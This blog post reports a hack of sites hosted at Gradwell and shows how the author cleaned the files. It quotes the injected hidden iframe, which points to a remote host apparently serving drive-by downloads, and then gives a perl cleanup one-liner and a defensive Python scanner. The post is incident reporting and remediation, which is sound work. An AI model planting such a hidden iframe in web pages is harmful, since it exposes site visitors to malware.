I woke up this morning to find all my clients' sites hosted at Gradwell have been hacked.
A quick poke around on domainsbyip.com shows that many other sites hosted on Gradwell's cluster have been similarly altered.
The hacker has added some HTML for a hidden iframe which points to a remote site. Presumably this site serves some sort of drive-by download attack.
Here's the code that is either prepended or appended to all .php and .html files:
<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/" style="display:none"></iframe>
I cleaned up the files as soon as I noticed the attack with this one-liner:
find . \( -name '*.php' -o -name '*.html' \) -type f -print0 | xargs -0 perl -pi -e 's{<iframe src="http://gaccess\.dynsite\.net/blog/wp-content/0wn3d/" style="display:none"></iframe>}{}g'
(NB: this is all one line)
The files were re-infected an hour or so later. Re-infection seems to have stopped now.
The attacker evidently has access to the entire home directory - not just the apache web root - as library files outside the web root were also affected.
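As an added example (not the author's one-liner or anything from Gradwell), a small Python scanner covering the cleanup and re-infection problem above: it reports whether the quoted iframe was prepended, appended or embedded in each .php/.html file under a directory (run it from the home directory, not just the web root), strips it, and snapshots file hashes so a second compromise shows up as a diff rather than by noticing it by eye. Only the iframe string comes from the post; the marker list, extensions and function names are assumptions.

```python
import hashlib
from pathlib import Path

# The exact snippet quoted in the post, kept as bytes so non-UTF-8 files survive untouched;
# further entries can be added if a variant of the injection turns up (assumed single marker).
MARKERS = [
    b'<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/" '
    b'style="display:none"></iframe>',
]
EXTS = {".php", ".html"}

def classify(data: bytes):
    """Return 'prepended', 'appended' or 'embedded' for an infected file, else None."""
    for marker in MARKERS:
        if marker in data:
            if data.lstrip().startswith(marker):
                return "prepended"
            return "appended" if data.rstrip().endswith(marker) else "embedded"
    return None

def web_files(root):
    """Every .php/.html file under root, which includes library code outside the web root."""
    return sorted(p for p in Path(root).rglob("*") if p.is_file() and p.suffix in EXTS)

def scan(root):
    """Map each infected file path to where the injected code sits."""
    found = ((str(p), classify(p.read_bytes())) for p in web_files(root))
    return {path: where for path, where in found if where}

def clean(path):
    """Strip every marker occurrence from one file; return how many were removed."""
    p = Path(path)
    data = p.read_bytes()
    removed = sum(data.count(m) for m in MARKERS)
    if removed:
        for m in MARKERS:
            data = data.replace(m, b"")
        p.write_bytes(data)
    return removed

def fingerprint(root):
    """sha256 per file; take one snapshot after cleanup, another later, and diff them."""
    return {str(p): hashlib.sha256(p.read_bytes()).hexdigest() for p in web_files(root)}

def changed_since(before, after):
    """Files that are new or whose content changed between two fingerprint snapshots."""
    return sorted(f for f, h in after.items() if before.get(f) != h)
```

A file that changed_since reports but scan does not flag is still worth a look: it means something other than the known iframe touched it.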
I reported the breach to support and am awaiting the outcome.
Luckily for me, the Primesolid site wasn't affected as I no longer host it at Gradwell.
There's a thread about this on uk.net.providers.gradwell
Peter Gradwell says:
there must be some sort of exploit in apache itself so we are also looking at that, and its permissions model.
Update 2010-12-19 10:03
As Hoover says in the comments, Gradwell have been hacked again this morning.
Exactly the same attack code has been added to all php and html files. Timestamps are updated to 2010-12-19 05:22.
:-/